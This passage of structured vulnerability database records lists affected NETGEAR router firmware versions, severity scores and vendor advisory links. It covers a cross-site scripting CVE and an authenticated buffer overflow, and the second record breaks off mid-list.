"matchCriteriaId": "78819A69-AF43-4741-AE4D-5FEC4280F25F",
"versionEndExcluding": "1.0.4.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B508ABA6-F17C-43D4-88D8-56ECD0057C65",
"versionEndExcluding": "1.1.5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D7A3E675-BB4F-4E8B-A041-C208F85B5C0E",
"versionEndExcluding": "1.0.2.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "63DDFEFE-402D-4AA8-A2C9-2217A5643DC1",
"versionEndExcluding": "1.0.2.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "679AAEA7-6415-4BBA-AE95-887C2CA609DC",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2000rpt_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B569EC22-7AB5-4136-B83E-BC466A6562B2",
"versionEndExcluding": "1.0.1.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2000rpt:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "6FB1BE0D-E3CF-4C16-8C11-706B238E9934",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3000rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "030AAA8B-65D9-42E4-ACF6-F2DB13D4AA30",
"versionEndExcluding": "1.0.2.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3000rp:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "AB71AC74-2D1B-4F1E-A70F-6590A00AAD9E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn3100rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B562B414-1A33-4E81-83FF-D8750D977DDC",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn3100rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4D8680F5-0C06-4CFC-8BA0-CF85D0438419",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72DCD4C0-A757-4F98-97BD-FB1FEBF3235C",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "026C640E-7594-4B5A-BDF9-FAB1CD135A47",
"versionEndExcluding": "1.0.2.94",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3700:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "257A5E68-8EDC-44F5-A85C-83A91C93CCE5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5025770E-D9D0-4FB6-BE29-1F48EDC31AF1",
"versionEndExcluding": "1.0.2.96",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1413C591-D066-4FA2-BEB1-6C60F8645F28",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1425F7B0-0990-43F4-9621-8DAE8508FEED",
"versionEndExcluding": "1.0.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "4428B145-B86D-4709-BBA9-64BDE7D35A25",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "81A6B7D4-1CBB-4D9E-8EB2-E5E82AFA59FA",
"versionEndExcluding": "1.0.0.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "C31D6808-4103-4543-B7AB-84A79CD12006",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E5684DEA-5F12-4E72-B8D1-C5F3E1D22726",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr1000:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "C8218868-273B-46DB-B636-D3F9A3768069",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "27B33A47-E305-43CC-9AC2-C35DE8E51F02",
"versionEndExcluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v5:*:*:*:*:*:*:*",
"matchCriteriaId": "317F25FF-B3A2-4C68-888F-D2627C564867",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "36CCD48D-4474-4363-8DE6-846714B99D3D",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C2189628-03E7-445A-9EF2-656A85539115",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "436026D2-0B8E-4BA5-AD34-9EB285EDA78A",
"versionEndExcluding": "1.1.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9877579C-D214-4605-93AA-2B78914CF33C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB542F95-5AE2-47E4-BD7B-34134B26AA4F",
"versionEndExcluding": "1.2.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by XSS. This affects D3600 before 1.0.0.67, D6000 before 1.0.0.67, D6100 before 1.0.0.56, D6200 before 1.1.00.24, D6220 before 1.0.0.32, D6400 before 1.0.0.66, D7000 before 1.0.1.52, D7000v2 before 1.0.0.44, D7800 before 1.0.1.30, D8500 before 1.0.3.35, DGN2200v4 before 1.0.0.96, DGN2200Bv4 before 1.0.0.96, EX2700 before 1.0.1.28, EX6100v2 before 1.0.1.54, EX6150v2 before 1.0.1.54, EX6200v2 before 1.0.1.52, EX6400 before 1.0.1.72, EX7300 before 1.0.1.72, EX8000 before 1.0.0.102, JNR1010v2 before 1.1.0.44, JWNR2010v5 before 1.1.0.44, PR2000 before 1.0.0.20, R6020 before 1.0.0.26, R6080 before 1.0.0.26, R6100 before 1.0.1.20, R6250 before 1.0.4.16, R6300v2 before 1.0.4.18, R6400 before 1.0.1.32, R6400v2 before 1.0.2.46, R6700 before 1.0.1.36, R6800 before 1.2.0.12, R6900v2 before 1.2.0.12, R6700v2 before 1.2.0.12, R6900 before 1.0.1.34, R6900P before 1.3.0.8, R7000 before 1.0.9.18, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7300DST before 1.0.0.58, R7500 before 1.0.0.118, R7500v2 before 1.0.3.24, R7800 before 1.0.2.40, R7900 before 1.0.2.4, R7900P before 1.1.5.14, R8000 before 1.0.4.4, R8000P before 1.1.5.14, R8500 before 1.0.2.110, R8300 before 1.0.2.110, R9000 before 1.0.2.52, WN2000RPTv3 before 1.0.1.8, WN3000RPv3 before 1.0.2.50, WN3100RPv2 before 1.0.0.42, WNDR3400v3 before 1.0.1.16, WNDR3700v4 before 1.0.2.94, WNDR4300 before 1.0.2.96, WNDR4300v2 before 1.0.0.50, WNDR4500v3 before 1.0.0.50, WNR1000v4 before 1.1.0.44, WNR2000v5 before 1.0.0.62, WNR2020 before 1.1.0.44, WNR2050 before 1.1.0.44, and WNR3500Lv2 before 1.2.0.46."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una vulnerabilidad de tipo XSS. Esto afecta a D3600 versiones anteriores a 1.0.0.67, D6000 versiones anteriores a 1.0.0.67, D6100 versiones anteriores a 1.0.0.56, D6200 versiones anteriores a 1.1.00.24, D6220 versiones anteriores a 1.0.0.32, D6400 versiones anteriores a 1.0.0.66, D7000 versiones anteriores a 1.0.1.52, D7000v2 versiones anteriores a 1.0.0.44, D7800 versiones anteriores a 1.0.1.30, D8500 versiones anteriores a 1.0.3.35, DGN2200v4 versiones anteriores a 1.0.0.96, DGN2200Bv4 versiones anteriores a 1.0.0.96, EX2700 versiones anteriores a 1.0.1.28, EX6100v2 versiones anteriores a 1.0.1.54, EX6150v2 versiones anteriores a 1.0.1.54, EX6200v2 versiones anteriores a 1.0.1.52, EX6400 versiones anteriores a 1.0.1.72, EX7300 versiones anteriores a 1.0.1.72, EX8000 versiones anteriores a 1.0.0.102, JNR1010v2 versiones anteriores a 1.1.0.44, JWNR2010v5 versiones anteriores a 1.1.0.44, PR2000 versiones anteriores a 1.0.0.20, R6020 versiones anteriores a 1.0.0.26, R6080 versiones anteriores a 1.0.0.26, R6100 versiones anteriores a 1.0. 1.20, R6250 versiones anteriores a 1.0.4.16, R6300v2 versiones anteriores a 1.0.4.18, R6400 versiones anteriores a 1.0.1.32, R6400v2 versiones anteriores a 1.0.2.46, R6700 versiones anteriores a 1.0.1.36, R6800 versiones anteriores a 1.2.0.12, R6900v2 versiones anteriores a 1.2.0.12, R6700v2 versiones anteriores a 1.2.0.12, R6900 versiones anteriores a 1.0.1.34, R6900P versiones anteriores a 1.3.0.8, R7000 versiones anteriores a 1.0.9.18, R7000P versiones anteriores a 1.3.0.8, R7100LG versiones anteriores a 1.0.0.34, R7300DST versiones anteriores a 1.0.0.58, R7500 versiones anteriores a 1.0.0.118, R7500v2 versiones anteriores a 1. 0.3.24, R7800 versiones anteriores a 1.0.2.40, R7900 versiones anteriores a 1.0.2.4, R7900P versiones anteriores a 1.1.5.14, R8000 versiones anteriores a 1.0.4.4, R8000P versiones anteriores a 1.1.5.14, R8500 versiones anteriores a 1.0.2.110, R8300 versiones anteriores a 1.0.2.110, R9000 versiones anteriores a 1.0. 2.52, WN2000RPTv3 versiones anteriores a 1.0.1.8, WN3000RPv3 versiones anteriores a 1.0.2.50, WN3100RPv2 versiones anteriores a 1.0.0.42, WNDR3400v3 versiones anteriores a 1.0.1.16, WNDR3700v4 versiones anteriores a 1.0.2.94, WNDR4300 versiones anteriores a 1.0.2.96, WNDR4300v2 versiones anteriores a 1.0.0.50, WNDR4500v3 versi\u00f3n anteriores a 1.0.0.50, WNR1000v4 versiones anteriores a 1.1.0.44, WNR2000v5 versiones anteriores a 1.0.0.62, WNR2020 versiones anteriores a 1.1.0.44, WNR2050 versiones anteriores a 1.1.0.44 y WNR3500Lv2 versiones anteriores a 1.2.0.46."
}
],
"id": "CVE-2017-18785",
"lastModified": "2024-11-21T03:20:54.943",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 1.1,
"impactScore": 2.7,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T15:15:12.957",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049534/Security-Advisory-for-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2950"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000049534/Security-Advisory-for-Cross-Site-Scripting-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2950"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-27 18:15
Modified
2024-11-21 04:03
Severity ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.38, D6400 before 1.0.0.74, D7000v2 before 1.0.0.74, D8500 before 1.0.3.39, DGN2200v4 before 1.0.0.102, DGN2200Bv4 before 1.0.0.102, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.22, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150 before 1.0.0.38, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.20, R6300v2 before 1.0.4.22, R6400 before 1.0.1.32, R6400v2 before 1.0.2.52, R6700 before 1.0.1.44, R6900 before 1.0.1.44, R6900P before 1.3.0.18, R7000 before 1.0.9.28, R7000P before 1.3.0.18, R7300DST before 1.0.0.62, R7900 before 1.0.2.10, R7900P before 1.3.0.10, R8000 before 1.0.4.12, R8000P before 1.3.0.10, R8300 before 1.0.2.116, R8500 before 1.0.2.116, WN2500RPv2 before 1.0.1.52, WNDR3400v3 before 1.0.1.18, and WNR3500Lv2 before 1.2.0.46.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B1C98EDC-D4FC-43BF-8EB6-A8357FEC61B2",
"versionEndExcluding": "1.0.0.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD763D04-70A0-4A50-8866-330B82703680",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "061389AF-C8DA-48DF-8D7E-014A9B8D5D09",
"versionEndExcluding": "1.0.0.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D5E70AF3-FFD8-4ACD-9F4C-DB03BFB1125A",
"versionEndExcluding": "1.0.3.39",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72004304-314A-4BE6-A33E-7F4CDF01FCEF",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "15616D3A-6741-42CE-926D-171CB231C88D",
"versionEndExcluding": "1.0.0.102",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "25090794-A90C-40CD-8E95-87EC4E98B928",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "54C9BF9A-F891-4337-AAFF-6E192A81B45B",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CDAA5899-B73C-4690-853E-B5400F034BE1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex3800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "746ADED9-4517-4482-AAEF-ACD301B433F8",
"versionEndExcluding": "1.0.2.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F10249E2-7DDE-4E3D-91FE-FB3FBA3682B0",
"versionEndExcluding": "1.0.0.38",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "46452E97-9347-4788-9570-1EECECC7255E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03DFA0CD-2C01-4885-B126-E24FCA5F9D6B",
"versionEndExcluding": "1.0.3.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2EC7119-878C-4E8F-97B0-DAD86E138F8C",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "06C765FD-E0A0-4401-9C6F-5F3C7EF98A52",
"versionEndExcluding": "1.0.4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FF768B9B-5C16-494F-95E7-F938798A4C5E",
"versionEndExcluding": "1.0.4.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
